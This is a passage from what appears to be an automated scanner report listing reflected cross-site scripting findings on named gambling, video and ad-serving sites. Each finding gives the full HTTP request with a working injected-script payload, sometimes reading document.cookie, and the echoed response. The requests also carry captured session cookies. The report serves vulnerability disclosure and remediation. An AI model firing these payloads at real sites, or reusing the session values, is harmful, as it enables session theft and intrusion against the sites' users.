X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1&c5944\"><script>alert(1)</script>b657ab65e6b=1" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.67. http://www.bet365.com/home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18d6"><script>alert(1)</script>b33b92fe45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/?f18d6"><script>alert(1)</script>b33b92fe45=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:51 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45587
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19232879864&f18d6"><script>alert(1)</script>b33b92fe45=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936ef"><script>alert(1)</script>c2361b79bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?936ef"><script>alert(1)</script>c2361b79bb1=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45588
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<!--version 1.0.0.1-->
<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19545540740&936ef"><script>alert(1)</script>c2361b79bb1=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4702d"><script>alert(1)</script>be96a23f3a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?4702d"><script>alert(1)</script>be96a23f3a3=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f78158bb406bb5151e43739ad7fa5f7b; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=c8335f487e2ebd40b47e9291ba6e9e32; expires=Tue, 15-May-2012 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%22bd5051062948efee2cb06d693c6e5416%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:19 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Mon, 16-May-2011 13:25:19 GMT; path=/
Content-Length: 73154

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?4702d"><script>alert(1)</script>be96a23f3a3=1" />
...[SNIP]...

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The value of the 70343%27-alert(1)-%2789d3bb43680 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dd46'-alert(1)-'c702a91d7ec was submitted in the 70343%27-alert(1)-%2789d3bb43680 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?70343%27-alert(1)-%2789d3bb43680=14dd46'-alert(1)-'c702a91d7ec HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13008
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:39 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
I_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=14dd46'-alert(1)-'c702a91d7ec','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e66'-alert(1)-'3904ab68a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c9e66'-alert(1)-'3904ab68a42=1 HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c9e66'-alert(1)-'3904ab68a42=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The value of the & request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7e02'-alert(1)-'f58d0b85f2e was submitted in the & parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?&f7e02'-alert(1)-'f58d0b85f2e HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22824

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...

var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&&f7e02'-alert(1)-'f58d0b85f2e','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c311e'-alert(1)-'d8afc8da06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms-and-conditions.aspx?c311e'-alert(1)-'d8afc8da06f=1 HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22827

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c311e'-alert(1)-'d8afc8da06f=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.74. http://www.primescratchcards.com/index.asp [curr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35af5'%3balert(1)//d13433ff10e was submitted in the curr parameter. This input was echoed as 35af5';alert(1)//d13433ff10e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD35af5'%3balert(1)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29900
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD35af5';alert(1)//d13433ff10e&AR=130137&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no
...[SNIP]...

3.75. http://www.primescratchcards.com/index.asp [curr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13cad"%3balert(1)//2102d64af9 was submitted in the curr parameter. This input was echoed as 13cad";alert(1)//2102d64af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD13cad"%3balert(1)//2102d64af9&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29898
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
document.trucksys.submit();
   DownloadCount();
}


function doflashSidebar_ByLng()
{
var flashGettingStarted = new FlashObject("http://www.primescratchcards.com/images/sidebar_flash/ENG_USD13cad";alert(1)//2102d64af9.swf", "movie", "197", "134", "6", "");
flashGettingStarted.addParam("quality", "best");
flashGettingStarted.addParam("allowScriptAccess", "always");
flashGettingStarted.addParam("wmode", "tra
...[SNIP]...

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45128'-alert(1)-'006f93246b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0243.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui!2'V=!!!!#=!o!t"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: vuday1=JOU8[NDf0(/hP#[; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$(#H!#yJY!$fh[!2'V=!%hKg!!!!$!?5%!$Tey-!wVd.!'Hct!$gSu!'x'(~~~~~=!o!t=(*f'!!.vL"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=OrgU(-xY.<O0,nW; path=/; expires=Mon, 16-May-2011 13:52:34 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:34 GMT
Pragma: no-cache
Content-Length: 3662
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt>\nvar gEbBAd = new Object();\ngEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_Placement
...[SNIP]...
asci_publiid = '1709175';
var asci_sectid = '1703625';
var asci_advliid = '3056520';
var asci_cid = '9245050';
var asci_p = '200';
var asci_refurl = escape('http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b');
if ( asci_refurl.length >
...[SNIP]...

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /sportsbook/registrationform.aspx

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0eb"><script>alert(1)</script>69648c939d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sportsbook/registrationform.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:45:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:46 GMT
Content-Length: 199712
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
wWindow = window.open('https://service.velaro.com/visitor/requestchat.aspx?showwhen=inqueue&secure=yes&Name:=&Email:=&siteid=7297&deptid=12265&Browser=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3'+getFormValues(), 'OnlineChatSoftware', 'toolbar=no,location=no,directories=no,menubar=no,status=no,scrollbars=no,resizable=yes,replace=no');this.newWindow.focus();this.newWindow.opener=window;return
...[SNIP]...

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00d9"-alert(1)-"58ee19908e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

